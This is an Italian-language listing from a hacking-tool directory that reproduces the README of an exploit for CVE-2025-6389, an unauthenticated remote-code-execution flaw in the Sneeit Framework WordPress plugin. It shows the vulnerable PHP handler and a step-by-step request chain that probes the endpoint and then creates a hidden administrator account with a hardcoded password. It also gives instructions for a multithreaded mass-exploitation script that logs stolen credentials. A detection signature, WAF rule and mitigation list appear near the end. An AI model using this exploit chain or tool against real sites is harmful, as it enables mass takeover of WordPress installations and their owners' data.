Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-6389 — Sneeit Framework <= 8.3 - Esecuzione di codice remoto non autenticata in sneeit_articles_pagination_callback | Kitploit
Strumenti/GitHubGitHub/nxploited/cve-2025-6389
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneRed Teaming
GitHubnxploited/cve-2025-6389

CVE-2025-6389

Sneeit Framework <= 8.3 - Esecuzione di codice remoto non autenticata in sneeit_articles_pagination_callback

Vedi Repository
14 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-6389

Sneeit Framework <= 8.3 - Esecuzione Remota di Codice non autenticata in sneeit_articles_pagination_callback

root@kitploit:~
    _______      ________    ___   ___ ___  _____         __ ____   ___   ___  
  / ____\ \    / /  ____|  |__ \ / _ \__ \| ____|       / /|___ \ / _ \ / _ \ 
 | |     \ \  / /| |__ ______ ) | | | | ) | |__ ______ / /_  __) | (_) | (_) |
 | |      \ \/ / |  __|______/ /| | | |/ /|___ \______| '_ \|__ < > _ < \__, |
 | |____   \  /  | |____    / /_| |_| / /_ ___) |     | (_) |__) | (_) |  / / 
  \_____|   \/   |______|  |____|\___|/____|____/       \___/____/ \___/  /_/  

Telegram CVE CVSS Python

License

📡 Non perdere la prossima uscita. Segui @KNxploited su Telegram — il canale definitivo per CVE appena divulgate, exploit funzionanti e ricerche di sicurezza d'élite. I primi a sapere. I primi ad agire.


🧠 Panoramica

CVE-2025-6389 è una vulnerabilità critica con punteggio CVSS 9.8 di Esecuzione Remota di Codice trovata nel plugin Sneeit Framework per WordPress.

Il difetto risiede nella funzione sneeit_articles_pagination_callback(), che passa ciecamente input fornito dall'utente nella funzione call_user_func() di PHP — un attaccante non autenticato può chiamare qualsiasi funzione PHP con argomenti arbitrari, inclusa wp_insert_user, ottenendo di fatto accesso completo come amministratore o eseguendo qualsiasi codice lato server.

CampoDettagli
CVE IDCVE-2025-6389
PluginSneeit Framework (sneeit-framework)
Versioni AffetteTutte le versioni fino alla 8.3 inclusa
Tipo di VulnerabilitàEsecuzione Remota di Codice (RCE)
Vettore di AttaccoRete — Nessuna Autenticazione Richiesta
CVSS 3.1 Score9.8 CRITICO
CVSS VectorAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CNAWordfence
ImpattoCompromissione completa del server / Acquisizione dell'admin
RicercatoreNxploited

💀 Analisi Approfondita della Vulnerabilità

La causa principale è l'uso improprio di call_user_func() di PHP nel gestore AJAX del plugin:

root@kitploit:~
// Registered without authentication check
add_action('wp_ajax_nopriv_sneeit_articles_pagination', 'sneeit_articles_pagination_callback');

function sneeit_articles_pagination_callback() {
    $callback = $_POST['callback'];  // ← User-controlled function name
    $args     = json_decode(stripslashes($_POST['args']), true); // ← User-controlled args

    // Calling ANY PHP function with ANY arguments — zero validation
    $result = call_user_func($callback, ...$args);

    echo $result;
    die();
}

Perché è critico:

  • wp_ajax_nopriv_* = accessibile da chiunque, senza login
  • call_user_func($callback, $args) = invocazione arbitraria di funzioni
  • L'attaccante può chiamare var_dump, system, wp_insert_user, eval o qualsiasi funzione PHP/WordPress
  • La risposta viene restituita direttamente — consentendo RCE sia cieca che verbosa

⚔️ Catena di Exploit

root@kitploit:~
Passo 1 — Sondaggio / Impronta digitale
──────────────────────────────────────────────────────────────────
POST /wp-admin/admin-ajax.php
  action   = sneeit_articles_pagination
  callback = var_dump
  args     = ["test"]

Risposta Attesa → array(1) { [0]=> string(4) "test" }
  ↓
Conferma: call_user_func() è raggiungibile e riflette l'output

──────────────────────────────────────────────────────────────────
Passo 2 — Creazione Account Amministratore
──────────────────────────────────────────────────────────────────
POST /wp-admin/admin-ajax.php
  action   = sneeit_articles_pagination
  callback = wp_insert_user
  args     = {"user_login":"Nxploited_XXXX",
               "user_pass":"xplpass",
               "user_email":"...",
               "role":"administrator"}

Risultato → Nuovo account amministratore creato silenziosamente sul target
  ↓
Accesso completo al pannello di amministrazione WordPress ottenuto ✔️

⚙️ Requisiti

root@kitploit:~
pip install requests rich
DipendenzaScopo
requestsRichieste HTTP con supporto sessione/proxy
richDashboard terminale live, pannelli, progresso
threadingElaborazione concorrente multi-target
queueDistribuzione thread-safe dei target

È richiesto Python 3.8+. Gli hints di tipo usano la sintassi tuple[...] introdotta in 3.9+ — usa 3.9+ per la migliore compatibilità.


📂 Struttura dei File

root@kitploit:~
CVE-2025-6389/
├── CVE-2025-6389.py          # Script exploit principale
├── list.txt                  # URL target — uno per riga
├── success_results.txt       # Generato automaticamente: target riusciti + credenziali
└── debug_responses/          # Generato automaticamente: risposte server grezze per debug
    └── <target>.resp.txt

🚀 Utilizzo

Passo 1 — Preparare i Target

Crea list.txt con un URL per riga:

root@kitploit:~
https://target1.com
https://target2.com
http://target3.com

Gli URL senza http:// o https:// vengono automaticamente prefissati con http://.


Passo 2 — Eseguire l'Exploit

root@kitploit:~
python CVE-2025-6389.py

Verrà richiesto:

root@kitploit:~
Nome file target (predefinito list.txt): list.txt
Numero di thread (predefinito 10):       20

Passo 3 — Dashboard in Tempo Reale

Lo script avvia una dashboard Rich in tempo reale che mostra:

root@kitploit:~
┌─────────────────────────────────────────────────────────────────────┐
│  [ASCII BANNER]                                                      │
├──────────────────────────────┬──────────────────────────────────────┤
│  Info                        │  Stats                               │
│  Usage: Put targets in...    │  Total Targets:  150                 │
│  Threads: 20                 │  Processed:      87                  │
│  Password: xplpass           │  Successes:      12                  │
│  Success Log: success...     │  Failures:       75                  │
│  Debug Dir: debug_responses  │  Elapsed:        00:01:43            │
├──────────────────────────────┴──────────────────────────────────────┤
│  Recent Results                                                      │
│  Time     Target                              Result                 │
│  14:23:01 https://victim.com                  SUCCESS               │
│  14:23:03 https://example.net                 FAIL                  │
└─────────────────────────────────────────────────────────────────────┘

Passo 4 — Rivedere i Risultati

Exploit riusciti vengono salvati in success_results.txt:

root@kitploit:~
https://victim.com | USER: Nxploited_4821 | PASS: xplpass | EMAIL: [email protected]

Risposte di debug (per target falliti) vengono salvate in debug_responses/:

root@kitploit:~
debug_responses/
└── https___victim.com.resp.txt   ← Risposta server grezza per analisi

🖥️ Riferimento Parametri dello Script

PromptPredefinitoDescrizione
File targetlist.txtFile contenente gli URL target
Numero di thread10 (max: 200)Worker concorrenti — aumenta per scansioni di massa
Passwordxplpass (hardcoded)Password impostata per gli account amministratore creati
Formato usernameNxploited_XXXXGenerato automaticamente con suffisso casuale di 4 cifre

📊 Firma di Rilevamento

L'exploit genera la seguente firma di rete — utile per difensori e autori di regole WAF:

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

action=sneeit_articles_pagination&callback=<FUNCTION>&args=<JSON>

Regola WAF / IDS (Pseudocodice):

root@kitploit:~
IF request.method == POST
AND request.path  == "/wp-admin/admin-ajax.php"
AND request.body CONTAINS "sneeit_articles_pagination"
AND request.body CONTAINS "callback"
THEN BLOCK + ALERT

🛡️ Mitigazione e Rimedio

Se sei un proprietario del sito, sviluppatore o difensore, esegui immediatamente questi passaggi:

  • ✅ Aggiorna Sneeit Framework a una versione superiore alla 8.3 se disponibile una patch
  • ✅ Disattiva ed elimina il plugin finché non viene confermata una versione patchata
  • ✅ Controlla gli account amministratore WordPress creati di recente per voci non autorizzate
  • ✅ Implementa la validazione dell'input lato server — non passare mai input utente in call_user_func()
  • ✅ Blocca le richieste POST non autenticate a admin-ajax.php a livello di WAF/Firewall
  • ✅ Monitora i log del server per le chiamate all'azione AJAX sneeit_articles_pagination
  • ✅ Abilita l'autenticazione a due fattori su tutti gli account amministratore esistenti come misura di contenimento

⚠️ Dichiarazione di non responsabilità

root@kitploit:~
QUESTO STRUMENTO È FORNITO ESCLUSIVAMENTE PER SCOPI EDUCATIVI, TEST DI PENETRAZIONE
AUTORIZZATI E RICERCA SULLA SICUREZZA.

Scaricando, eseguendo o modificando questo script, accetti esplicitamente:

  • Hai l'autorizzazione ESPLICITA e SCRITTA dal proprietario di ogni
    sistema che testi. Nessuna eccezione.

  • Stai operando in un ambiente di laboratorio controllato o durante un
    impegno formalmente approvato.

  • NON distribuirai questo strumento contro alcun sistema, rete o
    infrastruttura per cui non hai il permesso legale di testare.

  • Nxploited e tutti i contributori NON si assumono ALCUNA responsabilità per
    qualsiasi uso non autorizzato, danno, perdita di dati, azione legale o
    procedimento penale derivante dall'uso di questo strumento.

L'uso non autorizzato di questo exploit costituisce reato penale ai sensi di:
  — Computer Fraud and Abuse Act (CFAA), USA
  — Computer Misuse Act (CMA), UK
  — EU Directive 2013/40/EU on Attacks Against Information Systems
  — E tutte le equivalenti leggi nazionali e internazionali sul cybercrimine.

USALO RESPONSABILMENTE. HACKERA IN MODO ETICO. DIVULGA RESPONSABILMENTE.

👤 Autore

Nome utenteNxploited (Khaled Alenazi)
Telegram@KNxploited
GitHubgithub.com/Nxploited

🔔 Segui @KNxploited su Telegram Il canale dove vengono pubblicati prima i veri exploit — CVE, zero-day, PoC e ricerche approfondite sulle vulnerabilità. Aggiornato regolarmente. Rimani all'erta.


Realizzato con precisione da Nxploited · Solo per ricerche di sicurezza autorizzate · CVSS 9.8 Critico
Scarica lo strumento